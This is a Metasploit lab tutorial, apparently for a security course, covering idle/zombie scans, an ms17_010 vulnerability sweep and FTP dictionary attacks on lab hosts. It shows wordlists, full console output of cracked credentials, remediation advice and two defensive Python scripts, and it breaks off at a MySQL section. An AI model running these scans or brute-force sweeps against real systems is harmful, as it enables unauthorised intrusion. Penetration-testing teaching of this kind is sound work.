msf auxiliary(scanner/ftp/ftp_login) > set stop_on_success true // stops as soon as an IP/password pair matches
false keeps trying even after a match is found
@ 06_Metasploit
1. Metasploit
- A penetration-testing tool that ships with a large collection of source code for scanning, exploiting vulnerabilities and building malicious payloads.
- It is installed on Kali Linux by default.
1) Main Metasploit commands
- The following are the most commonly used Metasploit commands.
msfconsole   Metasploit console executable
msfdb        Metasploit database management executable
msfvenom     executable for building malicious payloads from a shell prompt
msfupdate    Metasploit update executable
root@kali:~# cd /usr/share/metasploit-framework
root@kali:/usr/share/metasploit-framework# ls
2) Source code written in 'Ruby'
- The source code Metasploit provides is written in Ruby.
root@kali:/usr/share/metasploit-framework# cd modules
root@kali:/usr/share/metasploit-framework/modules# ls
root@kali:/usr/share/metasploit-framework/modules# cd auxiliary
root@kali:/usr/share/metasploit-framework/modules/auxiliary# ls
root@kali:/usr/share/metasploit-framework/modules/auxiliary# cd scanner
root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner# ls
root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner# cd portscan
root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/portscan# ls
root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/portscan# vi syn.rb
It is written in Ruby.
root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/portscan# cd ../../../../
root@kali:/usr/share/metasploit-framework# ls
3) Wordlist files provided
- Wordlist files for cracking IDs/passwords are provided.
root@kali:/usr/share/metasploit-framework# ls data
root@kali:/usr/share/metasploit-framework# ls data/wordlists
root@kali:/usr/share/metasploit-framework/data/wordlists# cat tomcat_mgr_default_userpass.txt
The userpass file contains the ID and password together.
root@kali:/usr/share/metasploit-framework/data/wordlists# cat tomcat_mgr_default_users.txt
root@kali:/usr/share/metasploit-framework# cat data/wordlists/tomcat_mgr_default_pass.txt
root@kali:/usr/share/metasploit-framework# cd
root@kali:~#
2. Creating wordlist files
1) Create the account ID file 'user.list'
root@kali:~# mkdir wordlists && cd wordlists
root@kali:~/wordlists# cat << EOF >> user.list
admin
administrator
root
msfadmin
user1
user2
user01
user02
tomcat
postgres
mysql
test
tester
ftpuser
ftpusers
cisco
EOF
root@kali:~/wordlists# cat user.list
2) Create the account password file 'pass.list'
root@kali:~/wordlists# cat << EOF >> pass.list
admin
administrator
root
toor
toor1234.
msfadmin
user1
user2
user01
user02
tomcat
postgres
mysql
test
tester
cisco
ftpuser
ftpusers
1111
0000
1234
1234qwer
qwerasdf
EOF
root@kali:~/wordlists# cat pass.list
3) Create the account ID/password file 'userpass.list'
root@kali:~/wordlists# cat << EOF >> userpass.list
admin 1111
admin 1234
admin 0000
administrator toor1234.
root
root toor
root toor1234.
msfadmin msfadmin
user1 user1
user2 user2
user01 user01
user01 toor1234.
user02 user02
tomcat tomcat
postgres postgres
test test
tester tester
mysql mysql
cisco cisco
ftpuser ftpuser
ftpusers ftpusers
EOF
root@kali:~/wordlists# cat userpass.list
root@kali:~/wordlists# cd
root@kali:~#
3. Linking msf with postgresql
- When Metasploit is linked with the postgresql DBMS, everything run inside Metasploit is stored in the DB.
- Because the results are stored in the DB, looking up information and running commands is fast.
1) Start and enable postgresql
root@kali:~# service postgresql start
root@kali:~# update-rc.d postgresql enable
root@kali:~# service postgresql status
2) Initialize and start msfdb
root@kali:~# msfdb
root@kali:~# msfdb init
Use msfdb init the first time you initialize. From the second time on, use msfdb reinit.
root@kali:~# msfdb start
3) Start msfconsole and check the DB connection
root@kali:~# msfconsole
msf > db_status
The DB connection works.
4) 'db_nmap' scan and checking the results
msf > db_nmap -sS -sV 192.168.20.200
The command is db_nmap, but it works exactly like nmap.
msf > hosts
Shows the target IP and MAC addresses from the nmap scan.
msf > services 192.168.20.200
Shows the scan results for that IP.
5) Checking that 'db_nmap' results are stored in the DB
msf > exit
root@kali:~#
root@kali:~# msfconsole -q
msfconsole -q suppresses the banner when Metasploit starts.
Because the DB is connected and command results are stored in it, the results are still there after exiting and coming back in.
msf > services 192.168.20.200
6) Re-initialize and start msfdb
msf > exit
root@kali:~#
root@kali:~# msfdb reinit
Re-initializes msfdb.
root@kali:~# msfconsole -q
msf >
msf > hosts
msfdb has been re-initialized, so the stored contents are gone.
4. 'nmap' scan
1) 'db_nmap' scan
msf > db_nmap -sS -sV -O 192.168.20.100
msf > db_nmap -sS -sV -O 192.168.20.200
msf > db_nmap -sS -sV -O 192.168.20.201
msf > db_nmap -sS -sV -O 192.168.20.202
msf > db_nmap -sS -sV -O 192.168.20.204
msf > hosts
msf > services 192.168.20.200
msf > exit
root@kali:~#
root@kali:~# msfdb reinit
Creating database user 'msf'
새 롤의 암호:
암호 확인:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
2) Using external nmap scan files
root@kali:~# ls nmapscan
CentOS.gnmap CentOS.scan Meta.xml Windows2008.nmap Windows7.gnmap Windows7.xml
CentOS.nmap CentOS.xml Windows2008.gnmap Windows2008.xml Windows7.nmap
root@kali:~# msfconsole -q
msf >
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
msf >
msf > db_import /root/nmapscan/CentOS.xml
msf > db_import /root/nmapscan/Windows2008.xml
msf > db_import /root/nmapscan/Windows7.xml
msf > db_import /root/nmapscan/Meta.xml
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.20.200 00:0c:29:63:3b:f3 Linux 2.6.X server
192.168.20.201 00:0c:29:89:7b:8d Windows 7 client
192.168.20.202 00:0c:29:82:c5:58 Windows 7 client
192.168.20.204 00:0c:29:df:d7:b3 Linux 2.6.X server
msf > services 192.168.20.200
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.20.200 21 tcp ftp open vsftpd 2.0.5
192.168.20.200 22 tcp ssh open OpenSSH 4.3 protocol 2.0
192.168.20.200 23 tcp telnet open BSD-derived telnetd
192.168.20.200 25 tcp smtp open Sendmail 8.13.8/8.13.8
192.168.20.200 53 tcp domain open ISC BIND 9.3.6-P1
192.168.20.200 80 tcp http open Apache httpd 2.2.3 (CentOS)
192.168.20.200 110 tcp pop3 open Dovecot pop3d
192.168.20.200 111 tcp rpcbind open 2 RPC #100000
192.168.20.200 143 tcp imap open Dovecot imapd
192.168.20.200 443 tcp http open Apache httpd 2.2.3 (CentOS)
192.168.20.200 993 tcp imap open Dovecot imapd
192.168.20.200 995 tcp pop3 open Dovecot pop3d
msf > exit
root@kali:~#
root@kali:~# msfdb reinit
Creating database user 'msf'
새 롤의 암호:
암호 확인:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
root@kali:~# msfconsole -q
msf >
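The db_import step above reads Nmap's XML output into the msf hosts/services tables. The following Python script is an added example, not part of this note or of Metasploit, that parses a constructed Nmap XML sample into the same host and service rows, skipping hosts that are not up and ports that are not open, so you can see which XML fields those tables are built from.

```python
import xml.etree.ElementTree as ET

# Constructed sample in Nmap's XML (-oX) layout, cut down to a few of the
# services the `services 192.168.20.200` table shows. Not a real scan file.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sS -sV -O -oX CentOS.xml 192.168.20.200">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.20.200" addrtype="ipv4"/>
    <address addr="00:0C:29:63:3B:F3" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/>
        <service name="ftp" product="vsftpd" version="2.0.5"/></port>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="4.3" extrainfo="protocol 2.0"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="Apache httpd" version="2.2.3" extrainfo="(CentOS)"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/>
        <service name="http-proxy"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.X" accuracy="96"/></os>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.20.250" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Parse Nmap XML into two lists of dicts shaped like the msf `hosts` and
    `services` tables. Hosts that are not 'up' and ports that are not 'open'
    are skipped, which is what db_import records as well."""
    root = ET.fromstring(xml_text.strip())
    hosts, services = [], []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = mac = None
        for a in host.findall("address"):
            if a.get("addrtype") == "ipv4":
                addr = a.get("addr")
            elif a.get("addrtype") == "mac":
                mac = a.get("addr").lower()   # msf prints MACs in lower case
        if addr is None:
            continue
        osmatch = host.find("os/osmatch")   # best OS guess from -O, if any
        hosts.append({"address": addr, "mac": mac,
                      "os_name": osmatch.get("name") if osmatch is not None else ""})
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name, info = "", ""
            if svc is not None:
                name = svc.get("name", "")
                # -sV fills product/version/extrainfo; join whatever is present
                info = " ".join(p for p in (svc.get("product"), svc.get("version"),
                                            svc.get("extrainfo")) if p)
            services.append({"host": addr, "port": int(port.get("portid")),
                             "proto": port.get("protocol"), "name": name,
                             "state": "open", "info": info})
    return hosts, services


def format_tables(hosts, services):
    """Render the parsed rows in the same column order msf prints them."""
    lines = ["address  mac  os_name"]
    lines += [f"{h['address']}  {h['mac'] or ''}  {h['os_name']}" for h in hosts]
    lines.append("host  port  proto  name  state  info")
    lines += [f"{s['host']}  {s['port']}  {s['proto']}  {s['name']}  {s['state']}  {s['info']}"
              for s in services]
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_tables(*parse_nmap_xml(SAMPLE_NMAP_XML)))
```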
5. Scanning with Metasploit
1) Idle Scan
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/ip
ipidseq.rb
- Purpose: send a TCP SYN to find systems whose service is inactive.
- Use: the IP addresses of the systems in the scan result can be used as spoofed source addresses and as zombie systems for an attack.
- search ipid
Look for hosts with port 80 open. -> Incremental! = an idle PC. - it can be used as a zombie PC -> SYNs are sent through the zombie PC's port 80 -> the attacker can stay hidden
msf auxiliary(scanner/ip/ipidseq) > set interface eth1
msf auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.20.0/24
msf auxiliary(scanner/ip/ipidseq) > set threads 16
Finds systems where the port 80 service is inactive.
msf auxiliary(scanner/ip/ipidseq) > exploit
[*] 192.168.20.1's IPID sequence class: Incremental! <- TCP port 80 inactive
[*] Scanned 27 of 256 hosts (10% complete)
[*] Scanned 56 of 256 hosts (21% complete)
[*] Scanned 79 of 256 hosts (30% complete)
[*] 192.168.20.100's IPID sequence class: All zeros
[*] Scanned 105 of 256 hosts (41% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 155 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] 192.168.20.204's IPID sequence class: All zeros
[*] 192.168.20.201's IPID sequence class: Incremental! <- TCP port 80 inactive
[*] 192.168.20.200's IPID sequence class: All zeros
[*] 192.168.20.202's IPID sequence class: Incremental! <- TCP port 80 inactive
[*] Scanned 206 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ip/ipidseq) > back
msf >
IPs 202 and 201 have the TCP port 80 service inactive!
- Start Wireshark on CentOS and begin capturing.
- On Kali, run an nmap scan with the '192.168.20.202' address from the 'ipidseq' scan result set as the spoofed address.
msf > db_nmap -Pn -sI 192.168.20.202 192.168.20.200
- In the CentOS Wireshark capture, look at the SYN packets whose source IP address is '192.168.20.202'.
The 192.168.20.202 (zombie PC) IP is sending SYNs to 192.168.20.200 through port 80.
- Once you have confirmed this, close Wireshark on CentOS.
2) Port Scan
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan
ack.rb ftpbounce.rb syn.rb tcp.rb xmas.rb
- Purpose: send a TCP SYN to find systems with active TCP services.
- Use: the IP addresses of the systems in the scan result can be used as spoofed addresses and as zombie systems for an attack.
They can also be selected as attack targets based on vulnerabilities in their active TCP services.
msf > search portscan
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(scanner/portscan/syn) > show options
msf auxiliary(scanner/portscan/syn) > set interface eth1
msf auxiliary(scanner/portscan/syn) > set rhosts 192.168.20.200
msf auxiliary(scanner/portscan/syn) > set ports 1-1000
msf auxiliary(scanner/portscan/syn) > set threads 16
msf auxiliary(scanner/portscan/syn) > show options
msf auxiliary(scanner/portscan/syn) > exploit
You can see that the ports above are open on 192.168.20.200.
3) SMB scan
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/smb
pipe_auditor.rb smb_enum_gpp.rb smb_lookupsid.rb
pipe_dcerpc_auditor.rb smb_enumshares.rb smb_ms17_010.rb
psexec_loggedin_users.rb smb_enumusers.rb smb_uninit_cred.rb
smb1.rb smb_enumusers_domain.rb smb_version.rb
smb2.rb smb_login.rb
- Purpose: send a TCP SYN (destination TCP port 445) to find systems with the SMB service (NetBIOS) active.
- NetBIOS: provides data sharing between Windows systems over the network. (TCP 445)
- Use: the Windows systems in the SMB scan result can be checked for SMB vulnerabilities, which can then be used in an attack.
msf > search smb_version
msf auxiliary(scanner/smb/smb_version) > show options
msf auxiliary(scanner/smb/smb_version) > set rhosts 192.168.20.0/24
msf auxiliary(scanner/smb/smb_version) > set threads 16
msf auxiliary(scanner/smb/smb_version) > show options
msf auxiliary(scanner/smb/smb_version) > exploit
Port 445 is found active on 201 and 202.
4) Scanning for systems with the SMB vulnerability (ms17_010)
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/smb
pipe_auditor.rb smb_enum_gpp.rb smb_lookupsid.rb
pipe_dcerpc_auditor.rb smb_enumshares.rb smb_ms17_010.rb
psexec_loggedin_users.rb smb_enumusers.rb smb_uninit_cred.rb
smb1.rb smb_enumusers_domain.rb smb_version.rb
smb2.rb smb_login.rb
- Purpose: scan for Windows systems that have the 'ms17_010' SMB vulnerability.
- 'ms17_010' SMB vulnerability: remote code execution, leading to backdoors and privilege escalation.
- Reference: https://www.exploit-db.com/exploits/42315
msf > search ms17_010
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > show options
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.20.0/24
msf auxiliary(scanner/smb/smb_ms17_010) > set threads 16
msf auxiliary(scanner/smb/smb_ms17_010) > show options
msf auxiliary(scanner/smb/smb_ms17_010) > exploit
The ms17_010 vulnerability was found on 201 and 202.
5) FTP scan
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/ftp
anonymous.rb easy_file_sharing_ftp.rb konica_ftp_traversal.rb
bison_ftp_traversal.rb ftp_login.rb pcman_ftp_traversal.rb
colorado_ftp_traversal.rb ftp_version.rb titanftp_xcrc_traversal.rb
- Purpose: send a TCP SYN (destination TCP port 21) to find systems with the FTP service active.
- Use: find systems with an active FTP service for FTP dictionary attacks and attacks on FTP service vulnerabilities.
msf > search ftp_version
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > show options
msf auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.20.0/24
msf auxiliary(scanner/ftp/ftp_version) > set threads 16
msf auxiliary(scanner/ftp/ftp_version) > show options
msf auxiliary(scanner/ftp/ftp_version) > exploit
200, 201 and 204 have the FTP service active.
msf auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous
msf auxiliary(scanner/ftp/anonymous) > show options
msf auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.20.0/24
msf auxiliary(scanner/ftp/anonymous) > set threads 16
msf auxiliary(scanner/ftp/anonymous) > exploit
200, 201 and 204 allow anonymous login.
msf auxiliary(scanner/ftp/anonymous) > back
msf > exit
root@kali:~# msfdb reinit
Creating database user 'msf'
새 롤의 암호:
암호 확인:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
root@kali:~#
root@kali:~# msfconsole -q
msf >
6) Scanning with 'nmap'
msf > db_nmap -sS -sV -A -p1-10000 -v 192.168.20.100
msf > db_nmap -sS -sV -A -p1-10000 -v 192.168.20.200
msf > db_nmap -sS -sV -A -p1-10000 -v 192.168.20.201
msf > db_nmap -sS -sV -A -p1-10000 -v 192.168.20.202
msf > db_nmap -sS -sV -A -p1-10000 -v 192.168.20.204
msf > hosts
msf > services 192.168.20.100
msf > services 192.168.20.200
msf > services 192.168.20.201
msf > services 192.168.20.202
msf > services 192.168.20.204
msf > exit
root@kali:~#
6. FTP dictionary attack
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/ftp
anonymous.rb easy_file_sharing_ftp.rb konica_ftp_traversal.rb
bison_ftp_traversal.rb ftp_login.rb pcman_ftp_traversal.rb
colorado_ftp_traversal.rb ftp_version.rb titanftp_xcrc_traversal.rb
- An attack that attempts FTP logins against a server with an active FTP service, trying ID/password pairs one after another.
- Once an attacker knows the 'ID/PASSWORD', they can log in via FTP and upload files, escalate privileges, delete or tamper with files, and so on.
1) FTP scan using 'ftp_version'
root@kali:~# msfconsole -q
msf > search ftp_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ftp/ftp_version normal FTP Version Scanner
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
RPORT 21 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
msf auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.20.0/24
rhosts => 192.168.20.0/24
msf auxiliary(scanner/ftp/ftp_version) > set threads 16
threads => 16
msf auxiliary(scanner/ftp/ftp_version) > exploit
[*] Scanned 33 of 256 hosts (12% complete)
[*] Scanned 54 of 256 hosts (21% complete)
[*] Scanned 80 of 256 hosts (31% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 155 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[+] 192.168.20.201:21 - FTP Banner: '220 Microsoft FTP Service\x0d\x0a'
[+] 192.168.20.200:21 - FTP Banner: '220 (vsFTPd 2.0.5)\x0d\x0a'
[+] 192.168.20.204:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 234 of 256 hosts (91% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ftp/ftp_version) > search ftp_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ftp/ftp_login normal FTP Authentication Scanner
2) Dictionary attack using 'ftp_login'
msf auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(scanner/ftp/ftp_login) > show options
Module options (auxiliary/scanner/ftp/ftp_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record anonymous/guest logins to the database
RHOSTS yes The target address range or CIDR identifier
RPORT 21 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(scanner/ftp/ftp_login) > set rhosts 192.168.20.200
rhosts => 192.168.20.200
msf auxiliary(scanner/ftp/ftp_login) > set user_file /root/wordlists/user.list
user_file => /root/wordlists/user.list
msf auxiliary(scanner/ftp/ftp_login) > set pass_file /root/wordlists/pass.list
pass_file => /root/wordlists/pass.list
msf auxiliary(scanner/ftp/ftp_login) > set stop_on_success true
stop_on_success => true
msf auxiliary(scanner/ftp/ftp_login) > show options
Module options (auxiliary/scanner/ftp/ftp_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /root/wordlists/pass.list no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record anonymous/guest logins to the database
RHOSTS 192.168.20.200 yes The target address range or CIDR identifier
RPORT 21 yes The target port (TCP)
STOP_ON_SUCCESS true yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /root/wordlists/user.list no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(scanner/ftp/ftp_login) > exploit
[*] 192.168.20.200:21 - 192.168.20.200:21 - Starting FTP login sweep
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: admin:admin (Incorrect: )
~ (omitted) ~
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: root: (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: root:root (Incorrect: )
[+] 192.168.20.200:21 - 192.168.20.200:21 - Login Successful: root:toor
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ftp/ftp_login) >
msf auxiliary(scanner/ftp/ftp_login) > unset user_file
Unsetting user_file...
msf auxiliary(scanner/ftp/ftp_login) > unset pass_file
Unsetting pass_file...
msf auxiliary(scanner/ftp/ftp_login) > set stop_on_success false
stop_on_success => false
msf auxiliary(scanner/ftp/ftp_login) > set userpass_file /root/wordlists/userpass.list
userpass_file => /root/wordlists/userpass.list
msf auxiliary(scanner/ftp/ftp_login) >
msf auxiliary(scanner/ftp/ftp_login) > exploit
[*] 192.168.20.200:21 - 192.168.20.200:21 - Starting FTP login sweep
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: admin:1111 (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: admin:1234 (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: admin:0000 (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: administrator:toor1234. (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: root: (Incorrect: )
[+] 192.168.20.200:21 - 192.168.20.200:21 - Login Successful: root:toor
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: msfadmin:msfadmin (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: user1:user1 (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: user2:user2 (Incorrect: )
[+] 192.168.20.200:21 - 192.168.20.200:21 - Login Successful: user01:user01
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: user02:user02 (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: tomcat:tomcat (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: postgres:postgres (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: mysql:mysql (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: cisco:cisco (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: test:test (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: tester:tester (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: ftpuser:ftpuser (Incorrect: )
[-] 192.168.20.200:21 - 192.168.20.200:21 - LOGIN FAILED: ftpusers:ftpusers (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ftp/ftp_login) >
3) FTP login attempt
- From Windows7, attempt an FTP server login using the discovered ID/PASSWORD pairs (root/toor, user01/user01).
- Ctrl+R -> cmd, Enter
C:\Users\Administrator>ftp 192.168.20.200
192.168.20.200에 연결되었습니다.
220 (vsFTPd 2.0.5)
사용자(192.168.20.200:(none)):
331 Please specify the password.
암호:
230 Login successful.
ftp>
ftp> quit
221 Goodbye.
4) Remediation
- Enforce FTP password complexity
- Disallow anonymous login
- Block repeated login attempts from the same IP address
Ex) Run an FTP dictionary attack against Windows2008 (192.168.20.201) and Meta (192.168.20.204) and crack the ID/PASSWORD.
- Using the ID/PASSWORD obtained from the dictionary attack, attempt an FTP login to the target from Windows7.
- Windows2008 FTP ID/PASSWORD?
- Meta FTP ID/PASSWORD?
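The third remediation item, blocking repeated login attempts from one IP, needs the server side to notice the pattern the ftp_login sweep above leaves behind: a burst of FAIL LOGIN lines from one client followed by an OK LOGIN. The following Python script is an added example, not part of this note, that runs a sliding-window detector over constructed vsftpd.log lines (vsftpd's own log layout, which the lab's vsftpd 2.0.5 server would write) and returns the IPs to block; the threshold and window values are assumptions to tune.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed vsftpd.log lines (not from the lab), in the layout vsftpd writes:
# '<ctime> [pid N] [user] FAIL LOGIN: Client "ip"' or '... OK LOGIN: Client "ip"'.
SAMPLE_LOG = """\
Mon Sep  9 10:00:00 2019 [pid 2101] [admin] FAIL LOGIN: Client "192.168.20.50"
Mon Sep  9 10:00:01 2019 [pid 2101] [admin] FAIL LOGIN: Client "192.168.20.50"
Mon Sep  9 10:00:02 2019 [pid 2101] [admin] FAIL LOGIN: Client "192.168.20.50"
Mon Sep  9 10:00:03 2019 [pid 2101] [administrator] FAIL LOGIN: Client "192.168.20.50"
Mon Sep  9 10:00:04 2019 [pid 2101] [root] FAIL LOGIN: Client "192.168.20.50"
Mon Sep  9 10:00:05 2019 [pid 2101] [root] OK LOGIN: Client "192.168.20.50"
Mon Sep  9 10:05:00 2019 [pid 2140] CONNECT: Client "192.168.20.201"
Mon Sep  9 10:05:03 2019 [pid 2140] [user01] FAIL LOGIN: Client "192.168.20.201"
Mon Sep  9 10:05:09 2019 [pid 2140] [user01] OK LOGIN: Client "192.168.20.201"
"""

LOGIN_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')


def parse_login(line):
    """Return (timestamp, ip, user, success) for a login line, else None."""
    m = LOGIN_RE.match(line)
    if m is None:
        return None          # CONNECT, UPLOAD etc. are not login events
    ts = datetime.strptime(" ".join(m["ts"].split()), "%a %b %d %H:%M:%S %Y")
    return ts, m["ip"], m["user"], m["result"] == "OK"


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Sliding-window count of failed logins per client IP.

    Emits one 'bruteforce' alert when an IP reaches `threshold` failures within
    `window_seconds`, and a 'success_after_bruteforce' alert when that same IP
    then logs in successfully while its failures are still inside the window.
    A single typo from another client never reaches the threshold.
    """
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in lines:
        ev = parse_login(line)
        if ev is None:
            continue
        ts, ip, user, success = ev
        recent = failures[ip]
        while recent and (ts - recent[0]).total_seconds() > window_seconds:
            recent.popleft()        # drop failures that fell out of the window
        if success:
            if ip in flagged and recent:
                alerts.append({"kind": "success_after_bruteforce", "ip": ip,
                               "user": user, "at": ts})
            continue
        recent.append(ts)
        if len(recent) >= threshold and ip not in flagged:
            flagged.add(ip)
            alerts.append({"kind": "bruteforce", "ip": ip,
                           "failures": len(recent), "at": ts})
    return alerts


def block_list(alerts):
    """IPs a firewall rule or fail2ban-style jail should block, in order seen."""
    seen = []
    for a in alerts:
        if a["kind"] == "bruteforce" and a["ip"] not in seen:
            seen.append(a["ip"])
    return seen


if __name__ == "__main__":
    found = detect_bruteforce(SAMPLE_LOG.splitlines())
    for a in found:
        print(a)
    print("block:", block_list(found))
```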
7. MySQL dictionary attack
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/mysql
mysql_authbypass_hashdump.rb mysql_login.rb mysql_writable_dirs.rb
mysql_file_enum.rb mysql_schemadump.rb
mysql_hashdump.rb mysql_version.rb
- An attack that attempts remote MySQL logins against a server with an active MySQL service, trying ID/password pairs one after another.
- Once an attacker knows the ID/PASSWORD, they can log in to MySQL remotely and then tamper with or exfiltrate the contents of the DB.
1) MySQL scan using 'mysql_version'
msf auxiliary(scanner/ftp/ftp_login) > search mysql_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
